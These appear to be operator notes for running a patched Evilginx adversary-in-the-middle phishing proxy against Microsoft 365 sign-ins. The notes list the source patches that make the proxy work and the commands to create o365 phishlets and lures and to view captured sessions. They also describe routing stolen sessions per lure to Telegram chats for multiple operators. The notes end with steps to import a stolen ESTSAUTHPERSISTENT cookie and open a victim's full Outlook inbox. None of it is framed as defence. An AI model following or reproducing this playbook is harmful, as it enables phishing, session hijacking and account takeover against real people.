Evilginx AitM
Jan Bakker fork — 3 source patches — confirmed S39/S42
The 3 Source Patches
| File | Change | Why |
|---|---|---|
| main.go | Port 443 to 8443 | Traefik owns 443, evilginx listens on 8443 |
| certdb.go | HTTP-01 to DNS-01 ACME | HTTP-01 fails behind proxy; DNS-01 validates via Cloudflare API |
| nameserver.go | AA flag = true | Without it Google DNS returns SERVFAIL, cert never issues. One line. Everything depends on it. |
Key Commands
config domain yourdomain.com
config ip VPS_IP
phishlets hostname o365 yourdomain.com
phishlets enable o365
lures create o365
lures get-url 0
sessions
sessions 5
blacklist unban allPer-Lure Routing
One evilginx instance supports unlimited lure URLs per phishlet. Each session stores landing_url. Map lure paths to different Telegram chat IDs in the notify script. 10 operators, 10 lures, 10 destinations, zero extra infrastructure. Not in official documentation — found by reading data.db directly.
The ESTSAUTHPERSISTENT Finding
Microsoft issues ESTSAUTHPERSISTENT at the identity provider level, not the application level. One capture from ANY M365 login grants browser UI access to all M365 services: Outlook, Teams, SharePoint, OneDrive. The victim logged into the o365 lure. The cookie opens Outlook. They are not the same service. That is the finding.
Use Cookie-Editor browser extension: import ESTSAUTHPERSISTENT value, visit outlook.office.com — full inbox access.